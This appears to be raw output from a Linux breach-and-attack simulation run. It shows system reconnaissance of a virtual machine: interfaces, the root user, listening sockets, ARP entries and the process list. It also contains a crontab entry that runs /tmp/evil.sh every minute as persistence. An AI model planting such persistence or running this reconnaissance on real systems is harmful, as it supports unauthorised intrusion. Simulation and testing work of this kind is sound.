182.73.209.102ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.163.133  netmask 255.255.255.0  broadcast 192.168.163.255
        inet6 fe80::20c:29ff:fed4:fc61  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d4:fc:61  txqueuelen 1000  (Ethernet)
        RX packets 74135  bytes 104765750 (99.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8898  bytes 969005 (946.2 KiB)
        TX errors 0  dropped 3 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 87  bytes 9453 (9.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 87  bytes 9453 (9.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root
/home/medusa/Linux_BAS_v2
* * * * * /tmp/evil.sh
1	Mon Aug  4 13:06:00 2025 a root
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp6       0      0 :::9090                 :::*                    LISTEN     
tcp6       0      0 ::1:631                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
unix  2      [ ACC ]     STREAM     LISTENING     19441    /tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     19443    /tmp/.X11-unix/X1
unix  2      [ ACC ]     STREAM     LISTENING     10257    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     18574    /run/user/1000/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     156016   /run/user/0/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     18586    /run/user/1000/bus
unix  2      [ ACC ]     STREAM     LISTENING     156028   /run/user/0/bus
unix  2      [ ACC ]     STREAM     LISTENING     18592    /run/user/1000/pulse/native
unix  2      [ ACC ]     STREAM     LISTENING     5882     /run/systemd/userdb/io.systemd.DynamicUser
unix  2      [ ACC ]     STREAM     LISTENING     18593    /run/user/1000/pipewire-0
unix  2      [ ACC ]     STREAM     LISTENING     5883     /run/systemd/io.systemd.ManagedOOM
unix  2      [ ACC ]     STREAM     LISTENING     18594    /run/user/1000/pipewire-0-manager
unix  2      [ ACC ]     STREAM     LISTENING     364957   /run/user/0/gnupg/S.keyboxd
unix  2      [ ACC ]     STREAM     LISTENING     366121   /run/user/0/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     366122   /run/user/0/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     18659    /run/user/1000/keyring/control
unix  2      [ ACC ]     STREAM     LISTENING     366123   /run/user/0/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     366124   /run/user/0/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     366147   /run/user/0/gnupg/S.scdaemon
unix  2      [ ACC ]     STREAM     LISTENING     5898     /run/systemd/journal/stdout
unix  2      [ ACC ]     STREAM     LISTENING     19161    /run/user/1000/keyring/pkcs11
unix  2      [ ACC ]     STREAM     LISTENING     19164    /run/user/1000/keyring/ssh
unix  2      [ ACC ]     STREAM     LISTENING     11738    /run/systemd/io.systemd.BootControl
unix  2      [ ACC ]     STREAM     LISTENING     1885751  /run/user/0/at-spi/bus
unix  2      [ ACC ]     STREAM     LISTENING     11739    /run/systemd/io.systemd.sysext
unix  2      [ ACC ]     STREAM     LISTENING     19421    /run/user/1000/at-spi/bus
unix  2      [ ACC ]     STREAM     LISTENING     19444    /run/user/1000/wayland-0
unix  2      [ ACC ]     STREAM     LISTENING     14260    /run/gdm/dbus/dbus-5YuXMmDi
unix  2      [ ACC ]     STREAM     LISTENING     14261    /run/gdm/dbus/dbus-QdiPAjCw
unix  2      [ ACC ]     STREAM     LISTENING     12419    /run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     12434    /run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     12435    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     19098    /tmp/.ICE-unix/2157
unix  2      [ ACC ]     STREAM     LISTENING     12438    /run/pcscd/pcscd.comm
unix  2      [ ACC ]     STREAM     LISTENING     12439    /run/ssh-unix-local/socket
unix  2      [ ACC ]     STREAM     LISTENING     12441    /run/.heim_org.h5l.kcm-socket
unix  2      [ ACC ]     STREAM     LISTENING     12442    /run/systemd/io.systemd.Hostname
unix  2      [ ACC ]     STREAM     LISTENING     12979    /var/run/mcelog-client
unix  2      [ ACC ]     STREAM     LISTENING     21028    /home/medusa/.cache/ibus/dbus-gyaO7dXA
unix  2      [ ACC ]     STREAM     LISTENING     29785    /run/user/1000/gvfsd/wsdd
unix  2      [ ACC ]     STREAM     LISTENING     13056    /var/run/lsm/ipc/simc
unix  2      [ ACC ]     STREAM     LISTENING     13061    /var/run/lsm/ipc/sim
unix  2      [ ACC ]     STREAM     LISTENING     1216289  /run/user/1000/gnupg/S.keyboxd
unix  2      [ ACC ]     STREAM     LISTENING     1217394  /run/user/1000/keyring/.ssh
unix  2      [ ACC ]     STREAM     LISTENING     1217414  /run/user/1000/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     1217415  /run/user/1000/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     1217416  /run/user/1000/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     1217417  /run/user/1000/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     1217440  /run/user/1000/gnupg/S.scdaemon
unix  2      [ ACC ]     STREAM     LISTENING     4223443  /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     13134    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     9752     /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     SEQPACKET  LISTENING     9753     /run/systemd/coredump
unix  2      [ ACC ]     STREAM     LISTENING     9754     /run/systemd/io.systemd.Credentials
unix  2      [ ACC ]     SEQPACKET  LISTENING     9755     /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     9757     /run/systemd/userdb/io.systemd.Multiplexer
unix  2      [ ACC ]     STREAM     LISTENING     19097    @/tmp/.ICE-unix/2157
unix  2      [ ACC ]     STREAM     LISTENING     19440    @/tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     19442    @/tmp/.X11-unix/X1
unix  2      [ ACC ]     STREAM     LISTENING     12437    @ISCSID_UIP_ABSTRACT_NAMESPACE
unix  2      [ ACC ]     STREAM     LISTENING     12436    @ISCSIADM_ABSTRACT_NAMESPACE
Active Internet connections (servers and established)
udp        0      0 192.168.163.133:68      192.168.163.254:67      ESTABLISHED
Active UNIX domain sockets (servers and established)
Active Bluetooth connections (servers and established)
? (192.168.163.254) at 00:50:56:fd:c8:cf [ether] on ens33
_gateway (192.168.163.2) at 00:50:56:eb:57:e3 [ether] on ens33
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  1.0  32208 17740 ?        Ss   02:37   0:14 /usr/lib/systemd/systemd --system --deserialize=77 rhgb
root           2  0.0  0.0      0     0 ?        S    02:37   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        S    02:37   0:00 [pool_workqueue_release]
root           4  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-rcu_gp]
root           5  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-sync_wq]
root           6  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-slub_flushwq]
root           7  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-netns]
root          12  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-mm_percpu_wq]
root          14  0.0  0.0      0     0 ?        I    02:37   0:00 [rcu_tasks_kthread]
root          15  0.0  0.0      0     0 ?        I    02:37   0:00 [rcu_tasks_rude_kthread]
root          16  0.0  0.0      0     0 ?        I    02:37   0:00 [rcu_tasks_trace_kthread]
root          17  0.0  0.0      0     0 ?        S    02:37   0:07 [ksoftirqd/0]
root          18  0.0  0.0      0     0 ?        I    02:37   0:21 [rcu_preempt]
root          19  0.0  0.0      0     0 ?        S    02:37   0:00 [rcu_exp_par_gp_kthread_worker/1]
root          20  0.0  0.0      0     0 ?        S    02:37   0:00 [rcu_exp_gp_kthread_worker]
root          21  0.0  0.0      0     0 ?        S    02:37   0:00 [migration/0]
root          22  0.0  0.0      0     0 ?        S    02:37   0:00 [idle_inject/0]
root          23  0.0  0.0      0     0 ?        S    02:37   0:00 [cpuhp/0]
root          25  0.0  0.0      0     0 ?        S    02:37   0:00 [kdevtmpfs]
root          26  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-inet_frag_wq]
root          27  0.0  0.0      0     0 ?        S    02:37   0:00 [kauditd]
root          28  0.0  0.0      0     0 ?        S    02:37   0:00 [khungtaskd]
root          29  0.0  0.0      0     0 ?        S    02:37   0:00 [oom_reaper]
root          31  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-writeback]
root          32  0.0  0.0      0     0 ?        S    02:37   0:22 [kcompactd0]
root          33  0.0  0.0      0     0 ?        SN   02:37   0:00 [ksmd]
root          34  0.0  0.0      0     0 ?        SN   02:37   0:08 [khugepaged]
root          35  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-cryptd]
root          36  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kblockd]
root          37  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-blkcg_punt_bio]
root          38  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kintegrityd]
root          39  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/9-acpi]
root          40  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-tpm_dev_wq]
root          41  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-md]
root          42  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-md_bitmap]
root          43  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-edac-poller]
root          44  0.0  0.0      0     0 ?        S    02:37   0:00 [watchdogd]
root          46  0.0  0.0      0     0 ?        S    02:37   0:35 [kswapd0]
root          54  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kthrotld]
root          59  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/24-pciehp]
root          60  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/25-pciehp]
root          61  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/26-pciehp]
root          62  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/27-pciehp]
root          63  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/28-pciehp]
root          64  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/29-pciehp]
root          65  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/30-pciehp]
root          66  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/31-pciehp]
root          67  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/32-pciehp]
root          68  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/33-pciehp]
root          69  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/34-pciehp]
root          70  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/35-pciehp]
root          71  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/36-pciehp]
root          72  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/37-pciehp]
root          73  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/38-pciehp]
root          74  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/39-pciehp]
root          75  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/40-pciehp]
root          76  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/41-pciehp]
root          77  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/42-pciehp]
root          78  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/43-pciehp]
root          79  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/44-pciehp]
root          80  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/45-pciehp]
root          81  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/46-pciehp]
root          82  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/47-pciehp]
root          83  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/48-pciehp]
root          84  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/49-pciehp]
root          85  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/50-pciehp]
root          86  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/51-pciehp]
root          87  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/52-pciehp]
root          88  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/53-pciehp]
root          89  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/54-pciehp]
root          90  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/55-pciehp]
root          91  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-acpi_thermal_pm]
root          92  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kmpath_rdacd]
root          93  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kaluad]
root          95  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-mld]
root          96  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-ipv6_addrconf]
root         101  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kstrp]
root         329  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kmpathd]
root         330  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kmpath_handlerd]
root         466  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-iscsi_conn_cleanup]
root         470  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-tls-strp]
root         472  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-cnic_wq]
root         473  0.0  0.0      0     0 ?        S<   02:37   0:00 [bnx2i_thread/0]
root         636  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-nvme-wq]
root         637  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-nvme-reset-wq]
root         638  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-nvme-delete-wq]
root         639  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-nvme-auth-wq]
root         640  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-nvme_tcp_wq]
root         671  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-mpt_poll_0]
root         673  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-mpt/0]
root         676  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-ata_sff]
root         682  0.0  0.0      0     0 ?        S    02:37   0:00 [scsi_eh_0]
root         683  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-scsi_tmf_0]
root         684  0.0  0.0      0     0 ?        S    02:37   0:00 [scsi_eh_1]
root         685  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-scsi_tmf_1]
root         686  0.0  0.0      0     0 ?        S    02:37   0:00 [scsi_eh_2]
root         687  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-scsi_tmf_2]
root         692  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/16-vmwgfx]
root         693  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-ttm]
root         773  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kdmflush/253:0]
root         779  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kdmflush/253:1]
root         811  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfsalloc]
root         812  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs_mru_cache]
root         813  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-buf/dm-0]
root         814  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-conv/dm-0]
root         815  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-reclaim/dm-0]
root         816  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-blockgc/dm-0]
root         817  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-inodegc/dm-0]
root         818  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-log/dm-0]
root         819  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-cil/dm-0]
root         820  0.0  0.0      0     0 ?        S    02:37   0:05 [xfsaild/dm-0]
root         883  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/56-vmw_vmci]
root         884  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/57-vmw_vmci]
root         885  0.0  0.0      0     0 ?        S    02:37   0:00 [irq/58-vmw_vmci]
root         901  0.0  0.3  34604  5520 ?        Ss   02:37   0:02 /usr/lib/systemd/systemd-journald
root         917  0.0  0.1  15868  2332 ?        Ss   02:37   0:00 /usr/lib/systemd/systemd-userdbd
root         947  0.0  0.1  37284  3352 ?        Ss   02:37   0:00 /usr/lib/systemd/systemd-udevd
root        1000  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-buf/sda2]
root        1001  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-conv/sda2]
root        1002  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-reclaim/sda2]
root        1003  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-blockgc/sda2]
root        1004  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-inodegc/sda2]
root        1005  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-log/sda2]
root        1006  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-cil/sda2]
root        1007  0.0  0.0      0     0 ?        S    02:37   0:00 [xfsaild/sda2]
root        1017  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-kdmflush/253:2]
root        1028  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-buf/dm-2]
root        1029  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-conv/dm-2]
root        1030  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-reclaim/dm-2]
root        1031  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-blockgc/dm-2]
root        1032  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-inodegc/dm-2]
root        1033  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-log/dm-2]
root        1034  0.0  0.0      0     0 ?        I<   02:37   0:00 [kworker/R-xfs-cil/dm-2]
root        1035  0.0  0.0      0     0 ?        S    02:37   0:01 [xfsaild/dm-2]
root        1046  0.0  0.1  94260  2468 ?        S<sl 02:37   0:00 /usr/sbin/auditd
root        1048  0.0  0.1   6424  1936 ?        S<   02:37   0:00 /usr/sbin/sedispatch
dbus        1064  0.0  0.1   9016  2336 ?        Ss   02:37   0:00 /usr/bin/dbus-broker-launch --scope system --audit
dbus        1089  0.0  0.2   8336  3572 ?        S    02:37   0:02 dbus-broker --log 4 --controller 9 --machine-id d1d405f7aeff43149efd65a0690f0921 --max-bytes 536870912 --max-fds 4096 --max-matches 131072 --audit
avahi       1090  0.0  0.1   6144  2284 ?        Ss   02:37   0:00 avahi-daemon: running [linux.local]
libstor+    1093  0.0  0.0   2504   952 ?        Ss   02:37   0:00 /usr/bin/lsmd -d
root        1094  0.0  0.0   2580   628 ?        Ss   02:37   0:00 /usr/sbin/mcelog --daemon --foreground
polkitd     1095  0.0  0.3 382944  6556 ?        Ssl  02:37   0:03 /usr/lib/polkit-1/polkitd --no-debug --log-level=err
rtkit       1096  0.0  0.1  86856  1996 ?        SNsl 02:37   0:00 /usr/libexec/rtkit-daemon
root        1097  0.0  0.2 530300  4948 ?        Ssl  02:37   0:00 /usr/libexec/accounts-daemon
root        1098  0.0  0.1 527816  3424 ?        Ssl  02:37   0:00 /usr/libexec/switcheroo-control
root        1099  0.0  0.2  19008  4388 ?        Ss   02:37   0:01 /usr/lib/systemd/systemd-logind
root        1100  0.0  0.2 541892  4652 ?        Ssl  02:37   0:00 /usr/libexec/udisks2/udisksd
root        1101  0.0  0.2 530496  3760 ?        Ssl  02:37   0:00 /usr/libexec/upowerd
root        1102  0.0  0.0 239364  1564 ?        Ss   02:37   0:00 /usr/bin/VGAuthService -s
root        1103  0.2  0.2 537012  4128 ?        Ssl  02:37   1:30 /usr/bin/vmtoolsd
avahi       1105  0.0  0.0   6144   644 ?        S    02:37   0:00 avahi-daemon: chroot helper
chrony      1129  0.0  0.1  84592  1872 ?        S    02:37   0:00 /usr/sbin/chronyd -F 2
root        1140  0.0  0.0   4304   960 ?        SNs  02:37   0:00 /usr/sbin/alsactl -s -n 19 -c -E ALSA_CONFIG_PATH=/etc/alsa/alsactl.conf --initfile=/lib/alsa/init/00main rdaemon
root        1164  0.0  0.2 390036  3436 ?        Ssl  02:37   0:00 /usr/sbin/ModemManager
root        1265  0.0  0.4 553484  8284 ?        Ssl  02:37   0:02 /usr/sbin/NetworkManager --no-daemon
root        1274  0.0  0.1 252860  2748 ?        Ss   02:37   0:00 /usr/sbin/cupsd -l
root        1275  0.0  0.0   8756  1468 ?        Ss   02:37   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1277  0.0  0.6 488876 10392 ?        Ssl  02:37   0:06 /usr/bin/python3 -Es /usr/sbin/tuned -l -P
root        1288  0.0  0.0   4656  1480 ?        Ss   02:37   0:00 /usr/sbin/atd -f
root        1289  0.0  0.1 229704  2008 ?        Ss   02:37   0:00 /usr/sbin/crond -n
root        1319  0.0  0.2 167688  3716 ?        Ssl  02:37   0:03 /usr/sbin/rsyslogd -n
root        1327  0.0  0.2 531240  4428 ?        Ssl  02:37   0:00 /usr/sbin/gdm
root        1390  0.0  0.3 487320  6592 ?        Ssl  02:37   0:04 /usr/bin/python3 -Es /usr/sbin/tuned-ppd -l
colord      1460  0.0  0.1 533872  3168 ?        Ssl  02:37   0:00 /usr/libexec/colord
root        1861  0.0  0.0  15240  1244 ?        Ss   02:38   0:00 /usr/sbin/wpa_supplicant -c /etc/wpa_supplicant/wpa_supplicant.conf -u -s
root        2041  0.0  0.2 606544  5020 ?        Sl   02:45   0:00 gdm-session-worker [pam/gdm-password]
medusa      2055  0.0  0.3  23776  5428 ?        Ss   02:47   0:01 /usr/lib/systemd/systemd --user
medusa      2057  0.0  0.0  14120   560 ?        S    02:47   0:00 (sd-pam)
medusa      2073  0.0  0.2 607860  3560 ?        Sl   02:47   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
medusa      2083  0.0  0.1 453592  1816 tty2     Ssl+ 02:47   0:00 /usr/libexec/gdm-wayland-session /usr/bin/gnome-session
medusa      2089  0.0  0.1   8656  1972 ?        Ss   02:47   0:00 /usr/bin/dbus-broker-launch --scope user
medusa      2090  0.0  0.1   6856  3004 ?        S    02:47   0:01 dbus-broker --log 4 --controller 9 --machine-id d1d405f7aeff43149efd65a0690f0921 --max-bytes 100000000000000 --max-fds 25000000000000 --max-matches 5000000000
medusa      2097  0.0  0.2 555372  4100 tty2     Sl+  02:47   0:00 /usr/libexec/gnome-session-binary
medusa      2153  0.0  0.0 307900  1656 ?        Ssl  02:47   0:00 /usr/libexec/gnome-session-ctl --monitor
medusa      2157  0.0  0.3 777392  5696 ?        Ssl  02:47   0:00 /usr/libexec/gnome-session-binary --systemd-service --session=gnome
medusa      2182  1.3 12.9 3790020 221472 ?      Ssl  02:47   8:17 /usr/bin/gnome-shell
medusa      2191  0.0  0.2 535392  4048 ?        Ssl  02:47   0:00 /usr/libexec/gvfsd
medusa      2197  0.0  0.1 827156  2836 ?        Sl   02:47   0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
medusa      2224  0.0  0.2 380352  3676 ?        Ssl  02:47   0:00 /usr/libexec/at-spi-bus-launcher
medusa      2230  0.0  0.0   8528  1460 ?        S    02:47   0:00 /usr/bin/dbus-broker-launch --config-file=/usr/share/defaults/at-spi2/accessibility.conf --scope user
medusa      2231  0.0  0.1   4764  1832 ?        S    02:47   0:00 dbus-broker --log 4 --controller 9 --machine-id d1d405f7aeff43149efd65a0690f0921 --max-bytes 100000000000000 --max-fds 6400000 --max-matches 5000000000
medusa      2232  0.0  0.2 233532  3860 ?        Ssl  02:47   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
medusa      2253  0.0  0.1 527220  2916 ?        Ssl  02:47   0:00 /usr/libexec/xdg-permission-store
medusa      2255  0.0  0.2 662616  4004 ?        Ssl  02:47   0:01 /usr/libexec/gnome-shell-calendar-server
medusa      2260  0.0  0.2 229368  3668 ?        Ssl  02:47   0:00 /usr/libexec/dconf-service
medusa      2267  0.0  0.2 911248  3880 ?        Ssl  02:47   0:00 /usr/libexec/evolution-source-registry
medusa      2286  0.0  0.1 2901520 2356 ?        Ssl  02:47   0:00 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.Shell.Notifications
medusa      2288  0.0  0.4 532992  8124 ?        Ssl  02:47   0:07 /usr/bin/ibus-daemon --panel disable
medusa      2289  0.0  0.2 601448  3628 ?        Ssl  02:47   0:00 /usr/libexec/gsd-a11y-settings
medusa      2290  0.0  0.3 781340  6240 ?        Ssl  02:47   0:01 /usr/libexec/gsd-color
medusa      2294  0.0  0.2 618236  3928 ?        Ssl  02:47   0:00 /usr/libexec/gsd-datetime
medusa      2295  0.0  0.2 677548  4340 ?        Ssl  02:47   0:01 /usr/libexec/gsd-housekeeping
medusa      2296  0.0  0.3 780000  5968 ?        Ssl  02:47   0:00 /usr/libexec/gsd-keyboard
medusa      2297  0.0  0.4 925416  6976 ?        Ssl  02:47   0:01 /usr/libexec/gsd-media-keys
medusa      2298  0.0  0.4 781188  7040 ?        Ssl  02:47   0:01 /usr/libexec/gsd-power
medusa      2302  0.0  0.2 545212  4228 ?        Ssl  02:47   0:00 /usr/libexec/gsd-print-notifications
medusa      2305  0.0  0.2 749136  3508 ?        Ssl  02:47   0:00 /usr/libexec/gsd-rfkill
medusa      2306  0.0  0.2 527508  3472 ?        Ssl  02:47   0:00 /usr/libexec/gsd-screensaver-proxy
medusa      2307  0.0  0.2 759416  4416 ?        Ssl  02:47   0:00 /usr/libexec/gsd-sharing
medusa      2309  0.0  0.2 603416  3608 ?        Ssl  02:47   0:00 /usr/libexec/gsd-smartcard
medusa      2310  0.0  0.2 608344  3824 ?        Ssl  02:47   0:00 /usr/libexec/gsd-sound
medusa      2314  0.0  0.2 750812  4000 ?        Ssl  02:47   0:00 /usr/libexec/gsd-usb-protection
medusa      2315  0.0  0.3 781504  6152 ?        Ssl  02:47   0:00 /usr/libexec/gsd-wacom
medusa      2340  0.0  0.3 924828  6400 ?        Sl   02:47   0:01 /usr/libexec/evolution-data-server/evolution-alarm-notify
medusa      2346  0.0  0.2 305432  3672 ?        Sl   02:47   0:00 /usr/libexec/gsd-disk-utility-notify
medusa      2354  0.2  0.5 582132  9932 ?        Sl   02:47   1:30 /usr/bin/vmtoolsd -n vmusr --uinputFd 3
medusa      2362  0.0  0.5 979804  8660 ?        Sl   02:47   0:04 /usr/bin/gnome-software --gapplication-service
medusa      2371  0.0  0.1 731440  2908 ?        Ssl  02:47   0:00 /usr/libexec/goa-daemon
medusa      2397  0.0  0.2 685964  4276 ?        Ssl  02:47   0:00 /usr/libexec/gvfs-udisks2-volume-monitor
medusa      2449  0.0  0.4 2975252 7996 ?        Ssl  02:47   0:01 /usr/bin/gjs -m /usr/share/gnome-shell/org.gnome.ScreenSaver
medusa      2511  0.0  0.2 930752  4312 ?        Ssl  02:47   0:01 /usr/libexec/evolution-calendar-factory
medusa      2527  0.0  0.1 528404  1948 ?        Sl   02:47   0:00 /usr/libexec/ibus-dconf
medusa      2529  0.0  0.6 716724 11064 ?        Sl   02:47   0:07 /usr/libexec/ibus-extension-gtk3
medusa      2532  0.0  0.2 641508  4244 ?        Sl   02:47   0:00 /usr/libexec/gsd-printer
medusa      2542  0.0  0.2 528356  3616 ?        Ssl  02:47   0:00 /usr/libexec/ibus-portal
medusa      2556  0.0  0.1 527812  2652 ?        Ssl  02:47   0:00 /usr/libexec/gvfs-mtp-volume-monitor
medusa      2562  0.0  0.2 541636  3584 ?        Ssl  02:47   0:03 /usr/libexec/goa-identity-service
medusa      2583  0.0  0.1 529408  2644 ?        Ssl  02:47   0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
medusa      2592  0.0  0.1 527492  2556 ?        Ssl  02:47   0:00 /usr/libexec/gvfs-goa-volume-monitor
medusa      2608  0.0  0.2 195080  4836 ?        S    02:47   0:02 /usr/bin/Xwayland :0 -rootless -noreset -accessx -core -auth /run/user/1000/.mutter-Xwaylandauth.RA5492 -listenfd 4 -listenfd 5 -displayfd 6 -initfd 7 -byteswappedclients -enable-ei-portal
medusa      2656  0.0  0.1 898048  3420 ?        Ssl  02:47   0:00 /usr/libexec/evolution-addressbook-factory
medusa      2670  0.0  0.2 454828  4192 ?        Sl   02:47   0:03 /usr/libexec/ibus-engine-simple
medusa      2745  0.1  0.1 388540  2948 ?        Ssl  02:47   1:10 /usr/bin/pipewire
medusa      2746  0.0  0.3 782236  5936 ?        Ssl  02:47   0:02 /usr/bin/wireplumber
